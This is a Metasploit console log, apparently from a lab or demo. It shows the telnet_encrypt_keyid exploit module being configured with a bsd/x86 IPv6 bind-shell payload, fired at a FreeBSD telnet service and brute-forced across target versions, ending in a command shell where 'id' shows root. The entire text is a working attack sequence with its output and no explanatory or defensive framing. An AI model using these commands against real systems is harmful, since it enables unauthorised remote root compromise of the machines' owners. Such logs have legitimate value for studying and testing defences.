10.8.28.2 - (Sessions: 0 Jobs: 0) exploit(telnet_encrypt_keyid) > set PAYLOAD bsd/x86/shell/bind_ipv6_tcp PAYLOAD => bsd/x86/shell/bind_ipv6_tcp 10.8.28.2 - (Sessions: 0 Jobs: 0) exploit(telnet_encrypt_keyid) > show options Module options (exploit/freebsd/telnet/telnet_encrypt_keyid): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password RHOST fe80::20c:29ff:fe4c:2f4d yes The target address RPORT 23 yes The target port USERNAME no The username to authenticate Payload options (bsd/x86/shell/bind_ipv6_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LPORT 4444 yes The listen port RHOST fe80::20c:29ff:fe4c:2f4d no The target address Exploit target: Id Name -- ---- 0 Automatic 10.8.28.2 - (Sessions: 0 Jobs: 0) exploit(telnet_encrypt_keyid) > exploit [*] [2012.02.03-16:29:56] Started bind handler [*] [2012.02.03-16:29:56] Brute forcing with 9 possible targets [*] [2012.02.03-16:29:56] Trying target FreeBSD 8.2... [*] [2012.02.03-16:29:56] FreeBSD/i386 (free.pwnme) (ttyp0)\x0d\x0a\x0d\x0alogin: [...] [*] [2012.02.03-16:30:00] Sending first payload [*] [2012.02.03-16:30:01] Sending second payload... [*] [2012.02.03-16:30:01] Sending stage (46 bytes) to fe80::20c:29ff:fe4c:2f4d [*] [2012.02.03-16:30:01] Trying target FreeBSD 7.0/7.1/7.2... [*] Command shell session 1 opened (fe80::20c:29ff:fecf:6aba%eth0:45801 -> fe80::20c:29ff:fe4c:2f4d%eth0:4444) at 2012-02-03 16:30:02 +0100 id uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)